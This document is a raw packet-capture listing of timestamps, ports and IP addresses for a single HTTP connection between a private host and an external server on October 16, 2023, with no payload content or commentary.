Oct 16, 2023 09:58:27.002348900 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002371073 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002407074 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002410889 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002444983 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002475023 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002515078 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002537012 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002574921 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002590895 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002624989 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002640009 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002670050 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002688885 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002727032 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002734900 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002784014 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002819061 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002861023 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002880096 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002923965 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.009800911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.009835958 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.009892941 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.009944916 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.009991884 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010016918 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010032892 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010087013 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010119915 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010164976 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010210037 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010246038 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010298967 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010325909 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010375977 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010379076 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010410070 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010416985 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010453939 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010516882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010565996 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010588884 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010627985 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010634899 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010669947 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010700941 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010749102 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010818005 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.010862112 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.010991096 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011040926 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011065006 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011111021 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011128902 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011183023 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011228085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011250019 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011270046 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011279106 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011285067 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011324883 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011356115 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011373043 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011425018 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011439085 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011455059 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011499882 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011537075 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011574984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011605024 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011639118 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011663914 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011703014 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011744976 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011789083 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.011794090 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.011833906 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.355748892 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.355777025 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.355786085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.355869055 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.355904102 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.355943918 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356024981 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356049061 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356064081 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356089115 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356113911 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356132984 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356161118 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356168032 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356199026 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356232882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356271029 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356283903 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356317997 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356323004 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356379986 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356393099 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356434107 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356446981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356472969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356483936 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356508970 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356563091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356623888 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356642962 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356682062 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356714964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356751919 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356771946 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356810093 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356863022 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.356900930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.356973886 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357011080 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357022047 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357057095 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357125044 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357156038 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357160091 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357191086 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357223988 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357259035 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357270956 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357305050 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357335091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357369900 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357393980 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357434034 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357448101 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357482910 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357554913 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357594967 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357645035 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357681990 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357727051 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357764006 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357817888 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357856035 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357873917 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357908010 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.357944965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357975960 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.357981920 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358010054 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358037949 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358076096 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358105898 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358153105 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358160019 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358196020 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358217001 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358254910 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358285904 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358318090 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358359098 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358396053 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358443022 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358457088 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358478069 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358500004 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358556986 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358592987 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358607054 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358645916 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358664036 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358707905 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358722925 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358756065 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358772039 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358810902 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358812094 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358848095 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358876944 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.358913898 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.358964920 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359005928 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359025955 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359061003 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359095097 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359131098 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359159946 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359198093 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359229088 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359263897 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359267950 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359277010 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359302998 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359338045 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359375000 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359409094 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359436989 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359457970 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359472990 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359491110 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359525919 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359580040 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359625101 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359635115 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359652042 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359673977 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359685898 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359744072 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359782934 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359841108 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359884977 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359884977 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359913111 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.359920979 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359971046 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.359988928 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360028982 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360049009 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360089064 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360111952 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360158920 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360165119 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360197067 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360198975 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360223055 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360235929 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360275984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360306978 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360342026 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360372066 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360413074 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360424042 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360460997 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360481024 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360516071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360579014 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360620975 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360651016 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360688925 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360742092 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360780001 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360780954 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360825062 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360857964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360894918 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.360943079 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.360984087 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361016989 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361047029 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361051083 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361084938 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361116886 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361156940 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361171007 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361211061 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361243010 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361258030 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361279964 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361299038 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361340046 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361373901 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361393929 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361434937 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361494064 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361534119 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361553907 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361593962 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361625910 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361661911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361664057 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361700058 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361749887 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361787081 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361804962 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361839056 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361871958 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361908913 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.361927032 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361963034 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.361968040 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362001896 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362034082 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362075090 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362108946 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362143993 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362178087 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362216949 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362267017 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362294912 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362303972 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362355947 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362358093 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362397909 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362437963 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362473965 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362508059 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362544060 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362545013 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362577915 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362634897 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362670898 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362703085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362740040 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362739086 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362772942 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362807035 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362843990 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362915039 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.362961054 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.362970114 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363009930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363090992 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363106012 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363128901 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363151073 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363181114 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363219976 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363241911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363298893 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363321066 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363360882 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363380909 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363419056 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363456964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363496065 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363516092 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363557100 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363588095 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363622904 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363627911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363662958 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363732100 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363770008 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363804102 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363837957 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363853931 CEST	80	49164	103.72.68.128	192.168.2.22
